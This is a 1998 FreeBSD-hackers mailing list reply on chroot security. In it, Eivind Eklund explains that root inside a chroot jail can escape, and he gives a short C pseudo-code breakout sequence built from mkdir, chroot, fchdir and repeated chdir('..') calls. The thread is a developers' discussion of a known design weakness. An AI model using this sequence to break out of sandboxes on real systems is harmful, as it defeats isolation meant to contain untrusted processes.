From owner-freebsd-hackers  Tue Nov 17 03:55:06 1998
Return-Path: <owner-freebsd-hackers@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id DAA28933
          for freebsd-hackers-outgoing; Tue, 17 Nov 1998 03:55:06 -0800 (PST)
          (envelope-from owner-freebsd-hackers@FreeBSD.ORG)
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA28916
          for <freebsd-hackers@FreeBSD.ORG>; Tue, 17 Nov 1998 03:55:01 -0800 (PST)
          (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218])
	by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id MAA21828;
	Tue, 17 Nov 1998 12:54:19 +0100 (CET)
Received: (from eivind@localhost)
	by bitbox.follo.net (8.8.8/8.8.6) id MAA20091;
	Tue, 17 Nov 1998 12:54:19 +0100 (MET)
Message-ID: <19981117125419.28799@follo.net>
Date: Tue, 17 Nov 1998 12:54:19 +0100
From: Eivind Eklund <eivind@yes.no>
To: Mike Smith <mike@smith.net.au>, Harold Gutch <logix@foobar.franken.de>
Cc: zhihuizhang <bf20761@binghamton.edu>,
        hackers <freebsd-hackers@FreeBSD.ORG>
Subject: Re: Question on chroot()
References: <19981115200813.B12524@foobar.franken.de> <199811152056.MAA14163@dingo.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.89.1i
In-Reply-To: <199811152056.MAA14163@dingo.cdrom.com>; from Mike Smith on Sun, Nov 15, 1998 at 12:56:03PM -0800
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
> > On Sun, Nov 15, 1998 at 09:56:32AM -0800, Mike Smith wrote:
> > > Breaking out of a chroot'ed environment is less easy if you're not 
> > > root
> > Is this meant to be read as "more or less impossible", that is,
> > impossible unless the user can become root first (due to insecure
> > suid-root binaries in the chroot-environment etc.), or can users
> > really break out in more or less every situation (of course
> > assuming stuff like that they don't have any open filehandles
> > pointing to the outside in the beginning).
> 
> It's quite difficult to break out of a chroot'ed environment, yes, and 
> it's intended to be impossible, so obviously you can only get out 
> through flaws in the implementation...

It is easy if you have root privileges inside the "jail".

	/* pseudo-code */
	mkdir("mybreakdir", 0700);
	breakfd = open(".", 0, 0);
	chroot("mybreakdir");
	fchdir(breakfd);
	for (i=0; i<1000; i++)
		chdir("..");
	chroot(".");

I'm not sure if you need the fchdir(); chroot() is not supposed to
affect your current directory.  I don't think anybody has fixed the
above problem; it seems quite difficult to fix (you have to know which
FDs are inside and outside the jail, which is non-trivial).

Eivind.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message